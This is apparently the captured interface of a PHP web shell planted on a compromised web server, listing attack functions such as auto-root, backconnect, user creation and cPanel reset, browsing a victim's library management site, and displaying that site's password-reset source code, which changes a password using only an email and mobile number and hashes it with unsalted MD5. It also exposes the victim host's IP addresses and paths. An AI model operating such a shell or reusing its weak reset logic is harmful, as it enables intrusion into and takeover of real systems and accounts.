Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.22.70.102
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
payroll /
libs /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
assets1
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
captcha.php
370
B
-rw-r--r--
change-password.php
4.34
KB
-rw-r--r--
check_availability.php
798
B
-rw-r--r--
dashboard.php
2.42
KB
-rw-r--r--
getBookRecord.php
3.34
KB
-rw-r--r--
index.php
2.85
KB
-rw-r--r--
issued-books.php
5.83
KB
-rw-r--r--
logout.php
376
B
-rw-r--r--
my-profile.php
4.59
KB
-rw-r--r--
opac.php
18.38
KB
-rw-r--r--
signup.php
5.43
KB
-rw-r--r--
studentid.txt
6
B
-rw-r--r--
user-forgot-password.php
4.31
KB
-rw-r--r--
userLogin.php
2.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user-forgot-password.php
<?php session_start(); error_reporting(0); include('includes/config.php'); if(isset($_POST['change'])) { //code for captach verification if ($_POST["vercode"] != $_SESSION["vercode"] OR $_SESSION["vercode"]=='') { echo "<script>alert('Incorrect verification code');</script>" ; } else { $email=$_POST['email']; $mobile=$_POST['mobile']; $newpassword=md5($_POST['newpassword']); $sql ="SELECT EmailId FROM tblstudents WHERE EmailId=:email and MobileNumber=:mobile"; $query= $dbh -> prepare($sql); $query-> bindParam(':email', $email, PDO::PARAM_STR); $query-> bindParam(':mobile', $mobile, PDO::PARAM_STR); $query-> execute(); $results = $query -> fetchAll(PDO::FETCH_OBJ); if($query -> rowCount() > 0) { $con="update tblstudents set Password=:newpassword where EmailId=:email and MobileNumber=:mobile"; $chngpwd1 = $dbh->prepare($con); $chngpwd1-> bindParam(':email', $email, PDO::PARAM_STR); $chngpwd1-> bindParam(':mobile', $mobile, PDO::PARAM_STR); $chngpwd1-> bindParam(':newpassword', $newpassword, PDO::PARAM_STR); $chngpwd1->execute(); echo "<script>alert('Your Password succesfully changed');</script>"; } else { echo "<script>alert('Email id or Mobile no is invalid');</script>"; } } } ?> <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <meta name="description" content="" /> <meta name="author" content="" /> <title>Online Library Management System | Password Recovery </title> <!-- BOOTSTRAP CORE STYLE --> <link href="assets/css/bootstrap.css" rel="stylesheet" /> <!-- FONT AWESOME STYLE --> <link href="assets/css/font-awesome.css" rel="stylesheet" /> <!-- CUSTOM STYLE --> <link href="assets/css/style.css" rel="stylesheet" /> <!-- GOOGLE FONT --> <link href='http://fonts.googleapis.com/css?family=Open+Sans' rel='stylesheet' type='text/css' /> <script type="text/javascript"> function valid() { if(document.chngpwd.newpassword.value!= document.chngpwd.confirmpassword.value) { alert("New Password and Confirm Password Field do not match !!"); document.chngpwd.confirmpassword.focus(); return false; } return true; } </script> </head> <body> <!------MENU SECTION START--> <?php include('includes/header.php');?> <!-- MENU SECTION END--> <div class="content-wrapper"> <div class="container"> <div class="row pad-botm"> <div class="col-md-12"> <h4 class="header-line">User Password Recovery</h4> </div> </div> <!--LOGIN PANEL START--> <div class="row"> <div class="col-md-6 col-sm-6 col-xs-12 col-md-offset-3" > <div class="panel panel-info"> <div class="panel-heading"> LOGIN FORM </div> <div class="panel-body"> <form role="form" name="chngpwd" method="post" onSubmit="return valid();"> <div class="form-group"> <label>Enter Reg Email id</label> <input class="form-control" type="email" name="email" required autocomplete="off" /> </div> <div class="form-group"> <label>Enter Reg Mobile No</label> <input class="form-control" type="text" name="mobile" required autocomplete="off" /> </div> <div class="form-group"> <label>Password</label> <input class="form-control" type="password" name="newpassword" required autocomplete="off" /> </div> <div class="form-group"> <label>ConfirmPassword</label> <input class="form-control" type="password" name="confirmpassword" required autocomplete="off" /> </div> <div class="form-group"> <label>Verification code : </label> <input type="text" class="form-control1" name="vercode" maxlength="5" autocomplete="off" required style="height:25px;" /> <img src="captcha.php"> </div> <button type="submit" name="change" class="btn btn-info">Chnage Password</button> | <a href="index.php">Login</a> </form> </div> </div> </div> </div> <!---LOGIN PABNEL END--> </div> </div> <!-- CONTENT-WRAPPER SECTION END--> <?php include('includes/footer.php');?> <!-- FOOTER SECTION END--> <script src="assets/js/jquery-1.10.2.js"></script> <!-- BOOTSTRAP SCRIPTS --> <script src="assets/js/bootstrap.js"></script> <!-- CUSTOM SCRIPTS --> <script src="assets/js/custom.js"></script> </body> </html>
Close